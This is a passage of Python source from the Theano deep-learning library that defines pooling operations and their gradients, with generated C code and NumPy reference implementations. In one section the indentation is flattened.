            return [self(*eval_inputs)]
        # R_op can receive None as eval_points.
        # That means there is no differentiable path through that input.
        # If this implies that you cannot compute some outputs,
        # return None for those.
        if eval_points[0] is None:
            return [None]
        # For max pooling, pick the eval_points values at the argmax
        # locations of the forward pass z.
        z = self(*inputs)
        x, ws, stride, pad = inputs
        return [
            DownsampleFactorMaxGradGrad(self.ignore_border, self.mode,
                                        self.ndim)(x, z, eval_points[0], ws,
                                                   stride, pad)
        ]
def c_headers(self):
headers = ['<algorithm>']
headers += super(Pool, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode not in ('max', 'sum', 'average_exc_pad', 'average_inc_pad'):
raise theano.gof.utils.MethodNotDefined()
x, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector) schedule(static)'
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim, params=sub['params'])
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
if self.mode == 'max':
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4)
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector = (a > collector) ? a : collector;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = collector;
"""
elif self.mode in ('sum', 'average_exc_pad', 'average_inc_pad'):
ccode += """
// initialize the sum at zero
collector = ((dtype_%(x)s)(0));
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update sum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector += a;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
if self.mode == "sum":
ccode += """
z[0] = collector;
"""
elif self.mode == 'average_inc_pad' and self.ignore_border:
# region size = product over all pooling dimensions
region_size = ' * '.join('ws[%d]' % i for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
else:
# region size = number elements of in this region
region_size = ' * '.join('(r_end[%d]-r_st[%d])' % (i, i) for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
    def c_code_cache_version(self):
        # Bump the first number whenever the generated C code changes so
        # cached compiled modules are invalidated; openmp affects codegen.
        return (9, self.openmp)
class PoolGrad(OpenMPOp):
    """Base class for the gradients of ``Pool``.

    Concrete subclasses (``MaxPoolGrad``, ``AveragePoolGrad``) implement the
    actual gradient computation; this class holds the shared output-shape
    arithmetic (:meth:`out_shape`) and the upgrade path (:meth:`prepare_node`)
    for graphs built with the old interface where ``ds``/``st``/``padding``
    were Op attributes rather than symbolic inputs.
    """
    __props__ = ('ignore_border', 'mode', 'ndim')
    @staticmethod
    def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None, ndim=2,
                  ds=None, st=None, padding=None):
        """Return the shape of the output from this op, for input of given
        shape and flags.

        Parameters
        ----------
        imgshape : tuple of integers or scalar Theano variables
            the shape of a tensor of images. The last N elements are
            interpreted as the downsampling dimensions.
        ws : tuple of N ints
            downsample factor over rows and columns this parameter
            indicates the size of the pooling region
        ignore_border : bool
            If ws doesn't divide imgshape, do we include an extra row/col/slice
            of partial downsampling (False) or ignore it (True).
        stride : list or tuple of N ints or None
            Stride size, which is the number of shifts over rows/cols/slices to get the
            next pool region. If stride is None, it is considered equal to ws
            (no overlap on pooling regions).
        pad : tuple of N ints or None
            For each downsampling dimension, this specifies the number of zeros to
            add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
            size of the top and bottom margins, pad_w specifies the size of the left and
            right margins. No padding is added if pad is None.
        ndim : int
            The number of pooling dimensions N.
            The default is 2.
        ds
            *deprecated*, use parameter ws instead.
        st
            *deprecated*, use parameter stride instead.
        padding
            *deprecated*, use parameter pad instead.

        Returns
        -------
        list :
            the shape of the output from this op, for input of given
            shape. This will have the same length as imgshape, but
            with last N elements reduced as per the downsampling &
            ignore_border flags.
        """
        # check for deprecated parameter names
        if ds is not None:
            if ws is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'ws' and 'ds'."
                    " Please provide a value only to 'ws'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'ds' parameter in PoolGrad is not going"
                    " to exist anymore as it is going to be replaced by the"
                    " parameter 'ws'.",
                    stacklevel=2
                )
                ws = ds
        elif ds is None and ws is None:
            raise ValueError(
                "You must provide a tuple value for the window size."
            )
        if st is not None:
            if stride is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'st and 'stride'."
                    " Please provide a value only to 'stride'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'st' parameter in PoolGrad is not going"
                    " to exist anymore as it is going to be replaced by the"
                    " parameter 'stride'.",
                    stacklevel=2
                )
                stride = st
        if padding is not None:
            if pad is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'padding' and pad."
                    " Please provide a value only to pad."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'padding' parameter in PoolGrad is not"
                    " going to exist anymore as it is going to be replaced"
                    " by the parameter 'pad'.",
                    stacklevel=2
                )
                pad = padding
        if len(imgshape) < ndim:
            raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
        # defaults: non-overlapping regions (stride == ws), no padding
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * ndim
        # shape of each pooled dimension after symmetric zero-padding
        patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
                            for i in xrange(ndim))
        def compute_out(v, downsample, stride):
            # Pooled size of one dimension; symbolic (theano.Variable) and
            # plain numeric inputs are handled on separate branches so that
            # constant shapes stay plain Python ints.
            if ignore_border:
                out = (v - downsample) // stride + 1
                if isinstance(out, theano.Variable):
                    return tensor.maximum(out, 0)
                else:
                    return np.maximum(out, 0)
            else:
                if isinstance(v, theano.Variable):
                    return tensor.switch(tensor.ge(stride, downsample),
                                         (v - 1) // stride + 1,
                                         tensor.maximum(0, (v - 1 - downsample) //
                                                        stride + 1) + 1)
                elif stride >= downsample:
                    return (v - 1) // stride + 1
                else:
                    return max(0, (v - 1 - downsample) // stride + 1) + 1
        out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
        rval = list(imgshape[:-ndim]) + out_shape
        return rval
    def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
        """
        Parameters
        ----------
        ignore_border : bool
            See :meth:`out_shape`.
        mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
            Pooling mode whose gradient this op computes
            ('max_deterministic' is accepted and mapped to 'max').
        ndim : int
            Number of pooling dimensions N.
        openmp : bool or None
            Forwarded to :class:`OpenMPOp`.
        """
        self.ndim = ndim
        self.ignore_border = ignore_border
        if mode == 'max_deterministic':
            # It seems max pool grad algo is already deterministic in CPU.
            mode = 'max'
        if mode not in ['max', 'sum', 'average_inc_pad', 'average_exc_pad']:
            raise ValueError(
                "Pool mode parameter only support 'max', 'sum',"
                " 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
        self.mode = mode
        super(PoolGrad, self).__init__(openmp=openmp)
    def prepare_node(self, node, storage_map, compute_map, impl):
        # Nodes created with the old interface carry ds/st/padding as Op
        # attributes; append them as constant inputs so the current code
        # path (which reads them from node.inputs) keeps working.
        if len(node.inputs) < 5:  # 5 for AveragePoolGrad, 6 for MaxPoolGrad
            # Old interface
            self.ndim = len(node.op.ds)
            self.mode = node.op.mode
            ws = theano.tensor.constant(node.op.ds)
            st = theano.tensor.constant(node.op.st)
            pad = theano.tensor.constant(node.op.padding)
            node.inputs.append(ws)
            node.inputs.append(st)
            node.inputs.append(pad)
            # register the appended inputs in the VM's storage/compute maps
            if isinstance(ws, theano.Constant):
                storage_map[ws] = [ws.data]
                compute_map[ws] = [True]
            else:
                storage_map[ws] = [None]
                compute_map[ws] = [False]
            if isinstance(st, theano.Constant):
                storage_map[st] = [st.data]
                compute_map[st] = [True]
            else:
                storage_map[st] = [None]
                compute_map[st] = [False]
            if isinstance(pad, theano.Constant):
                storage_map[pad] = [pad.data]
                compute_map[pad] = [True]
            else:
                storage_map[pad] = [None]
                compute_map[pad] = [False]
    def infer_shape(self, node, in_shapes):
        # The gradient wrt the input has the same shape as the input itself.
        return [in_shapes[0]]
class MaxPoolGrad(PoolGrad):
    """Gradient of max pooling wrt its input ``x``.

    Each output gradient ``gz[r]`` is added to every position of the
    corresponding pooling region whose input value equals the stored
    maximum ``maxout[r]`` (ties therefore receive the gradient more
    than once).
    """
    # params_type ignore_border don't change c code
    def __init__(self, ignore_border, ndim=2, openmp=None):
        PoolGrad.__init__(self, ignore_border, mode='max', ndim=ndim, openmp=openmp)
    def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
        """Build the Apply node.

        ``x`` is the pooling input, ``maxout`` the pooled output and ``gz``
        the gradient wrt ``maxout``; ``ws``/``stride``/``pad`` become
        symbolic integer vectors of length ``self.ndim``.
        """
        # make_node should only be called by the grad function of
        # Pool, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        maxout = tensor.as_tensor_variable(maxout)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert isinstance(x, Variable) and x.ndim >= nd
        assert isinstance(maxout, Variable) and maxout.ndim >= nd
        assert isinstance(gz, Variable) and gz.ndim >= nd
        assert isinstance(ws, Variable) and ws.ndim == 1
        assert isinstance(stride, Variable) and stride.ndim == 1
        assert isinstance(pad, Variable) and pad.ndim == 1
        assert x.ndim == maxout.ndim == gz.ndim >= nd
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
    def perform(self, node, inp, out):
        """Python (NumPy) implementation of the max-pool gradient."""
        assert self.mode == 'max'
        x, maxout, gz, ws, stride, pad = inp
        gx_stg, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'MaxPoolGrad requires input with {} or more dimensions'.format(nd))
        pool_out_shp = maxout.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        # pad the image
        if max(pad) != 0:
            y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y[(slice(None),) * (len(x.shape) - nd) +
              tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
        else:
            y = x
        gx = np.zeros_like(y)
        # precompute the region boundaries for each dimension
        region_ranges = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                # regions are clipped to the unpadded part of the image
                start = builtins.max(j * stride[i], pad[i])
                end = builtins.min(start + ws[i], img_shp[i])
                region_ranges[i].append(xrange(start, end))
        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            gxk = gx[k]
            gzk = gz[k]
            yk = y[k]
            maxoutk = maxout[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                maxout_value = maxoutk[r]
                # iterate inside region
                for c in itertools.product(*[region_ranges[i][r[i]]
                                             for i in xrange(nd)]):
                    # every tie with the maximum receives the gradient
                    if maxout_value == yk[c]:
                        gxk[c] += gzk[r]
        # unpad the image
        gx = gx[(slice(None),) * (len(x.shape) - nd) +
                tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
        gx_stg[0] = gx
    def grad(self, inp, grads):
        """Second-order gradient; the shape parameters are disconnected."""
        x, maxout, gz, ws, stride, pad = inp
        ggx, = grads
        return ([theano.tensor.zeros_like(x),
                 theano.tensor.zeros_like(maxout),
                 DownsampleFactorMaxGradGrad(ndim=self.ndim,
                                             ignore_border=self.ignore_border)(
                                                 x, maxout, ggx, ws, stride, pad)] +
                [DisconnectedType()() for i in inp[3:]])
    def connection_pattern(self, node):
        # gradients flow through x, maxout and gz only; ws/stride/pad are
        # shape parameters and therefore disconnected
        return [[1], [1], [1], [0], [0], [0]]
    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation of the max-pool gradient."""
        assert self.mode == 'max'
        x, z, gz, ws, stride, pad = inp
        gx, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        if self.openmp:
            # run in parallel over each pooling block
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        // sanity checks
        int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        int z_typenum = PyArray_ObjectType((PyObject*)%(z)s, 0);
        int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
        if ((x_typenum != z_typenum) || (x_typenum != gz_typenum))
        {
            PyErr_SetString(PyExc_ValueError, "input types must all match");
            %(fail)s;
        }
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(z)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "z must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
            || *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
          Py_XDECREF(%(gx)s);
          %(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
        }
        else {
          PyArray_FILLWBYTE(%(gx)s, 0);
        }
        dtype_%(z)s maximum; // temp var for maximum value in a region
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }

                // then loop over each region in each pooling dimension
        """
        # one nested C for-loop per pooling dimension
        for i in xrange(nd):
            ccode += """
        for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
          r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
          r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
          // skip the padding
          r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
          r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
          // from padded_img space to img space
          r_st[%(i)s] -= pd[%(i)s];
          r_end[%(i)s] -= pd[%(i)s];
          // use the index to find the correct position in the output
          o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
              dtype_%(gz)s * gz;
              if (%(total_ndim)s == 4)
              {
                // the maximum value
                maximum = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
                // the gradient corresponding to this maximum value in z
                gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
              }
              else
              {
                // the maximum value
                maximum = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)))[0];
                // the gradient corresponding to this maximum value in z
                gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
              }
        """
        # inner loops over the elements of each pooling region
        for i in xrange(nd):
            ccode += """
              // go through the pooled region in the unpadded input
              for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
              {
                i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                dtype_%(x)s a;
                dtype_%(gx)s * gx;
                if (%(total_ndim)s == 4)
                {
                  a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                  gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                }
                else
                {
                  a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                  gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
                }
                if (a == maximum){
                  gx[0] = gx[0] + gz[0];
                }
        """
        # close the inner region loops
        for i in xrange(nd):
            ccode += """
              } // for loop over region
            """
        # close the per-dimension region loops
        for i in xrange(nd):
            ccode += """
        } // loop over pooling dimension
        """
        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()
    def c_code_cache_version(self):
        # bump to invalidate previously compiled C code
        return (0, 10, self.openmp)
class AveragePoolGrad(PoolGrad):
    """Gradient of sum/average pooling wrt the input.

    Each output gradient is spread uniformly over its pooling region:
    unchanged for mode ``'sum'``, divided by the region size for the
    average modes.
    """
    # ignore_border is used for perform, but not c code. No need in params_type
    def __init__(self, ignore_border, mode='average_inc_pad', ndim=2):
        assert mode in ['sum', 'average_inc_pad', 'average_exc_pad']
        PoolGrad.__init__(self, ignore_border, mode, ndim)
    # There is an extra dummy parameter to match the parameter count
    # of MaxPoolGrad. They have to keep the same interface because of
    # the DownsampleFactorMaxGrad trick to keep old scripts working
    # (see downsample.py for details on this).
    def make_node(self, x, gz, ws, stride=None, pad=None, dummy=None):
        """Build the Apply node; ``dummy`` only pads the signature (see above)."""
        # make_node should only be called by the grad function of
        # Pool, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert isinstance(x, Variable) and x.ndim >= nd
        assert isinstance(gz, Variable) and gz.ndim >= nd
        assert isinstance(ws, Variable) and ws.ndim == 1
        assert isinstance(stride, Variable) and stride.ndim == 1
        assert x.ndim == gz.ndim >= nd
        assert isinstance(pad, Variable) and pad.ndim == 1
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, gz, ws, stride, pad], [x.type()])
    def perform(self, node, inp, out):
        """Python (NumPy) implementation of the sum/average-pool gradient."""
        x, gz, ws, stride, pad = inp
        gx_stg, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'AveragePoolGrad requires input with {} or more dimensions'.format(nd))
        if self.mode == 'average_exc_pad' and max(pad) != 0:
            raise NotImplementedError()
        z_shape = self.out_shape(x.shape, ws, self.ignore_border, stride, pad, nd)
        # NOTE(review): this pooled-shape buffer is only read for
        # pool_out_shp below; gx_stg[0] is overwritten with gx at the end.
        if (gx_stg[0] is None) or (gx_stg[0].shape != z_shape):
            gx_stg[0] = np.empty(z_shape, dtype=x.dtype)
        zz = gx_stg[0]
        # size of pooling output
        pool_out_shp = zz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        inc_pad = self.mode == 'average_inc_pad'
        sum_mode = self.mode == 'sum'
        # initialize the padded output
        gx = np.zeros((x.shape[:-nd] + img_shp), dtype=x.dtype)
        # precompute the region boundaries and sizes for each dimension
